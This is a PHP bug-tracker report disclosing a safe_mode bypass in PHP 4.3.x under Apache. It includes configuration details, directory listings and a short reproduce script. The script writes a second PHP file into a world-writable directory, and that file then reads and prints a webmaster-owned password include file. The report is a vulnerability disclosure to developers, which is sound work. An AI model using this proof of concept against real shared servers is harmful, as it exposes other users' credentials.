From: marrtins at hackers dot lv Operating system: Linux PHP version: 4.3.1 PHP Bug Type: Scripting Engine problem Bug description: safe_mode bypass
Description: ------------ apache_1.3.27 httpd.conf ---------- User webmaster Group nobody ./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite ====================================== php-4.3.0 php.ini --------- safe_mode = On ./configure \ --with-mysql=/usr/local \ --with-mcrypt=/usr/local/lib/libmcrypt \ --with-apache=../apache_1.3.27 \ --enable-track-vars \ --with-gd=/usr/local \ --with-interbase=/opt/interbase \ --enable-trans-sid \ --with-png-dir=/usr/local \ --with-jpeg-dir=/usr/local \ --with-zlib-dir=/usr/local \ --enable-sockets \ --with-gettext \ --with-xml \ --enable-ftp \ --with-imap=/root/.hore_imp/imap-2002.RC10 \ --with-iconv=/usr/local/ ====================================== ~/public_html> ls -al * drwxr-xr-x 3 test users 4096 aug 19 19:05 . drwx--x--x 5 test users 4096 aug 19 19:04 .. -rw-r--r-- 1 test users 146 aug 19 18:47 hack.php drwxrwxrwx 2 test users 4096 aug 19 19:03 test after accessing http://some_server/~test/hack.php php makes test/stole.php ~/public_html> ls -al test drwxrwxrwx 2 test users 4096 aug 19 19:07 . drwxr-xr-x 3 test users 4096 aug 19 19:05 .. -rw-r--r-- 1 webmaste nobody 61 aug 19 19:07 stole.php after that http://some_server/~test/test/stole.php locally reads /www/secret/pass.inc.php owned by webmaster Reproduce code: --------------- <? $data='<? $data = file(\'/www/secret/pass.inc.php\'); print_r($data); ?>'; $f=fopen('/home/test/public_html/test/stole.php', 'w'); fwrite($f, $data); fclose($f); ?> -- Edit bug report at http://bugs.php.net/?id=25149&edit=1 -- Try a CVS snapshot (php4): http://bugs.php.net/fix.php?id=25149&r=trysnapshot4 Try a CVS snapshot (php5): http://bugs.php.net/fix.php?id=25149&r=trysnapshot5 Fixed in CVS: http://bugs.php.net/fix.php?id=25149&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=25149&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=25149&r=needtrace Try newer version: http://bugs.php.net/fix.php?id=25149&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=25149&r=support Expected behavior: http://bugs.php.net/fix.php?id=25149&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=25149&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=25149&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=25149&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=25149&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=25149&r=dst IIS Stability: http://bugs.php.net/fix.php?id=25149&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=25149&r=gnused
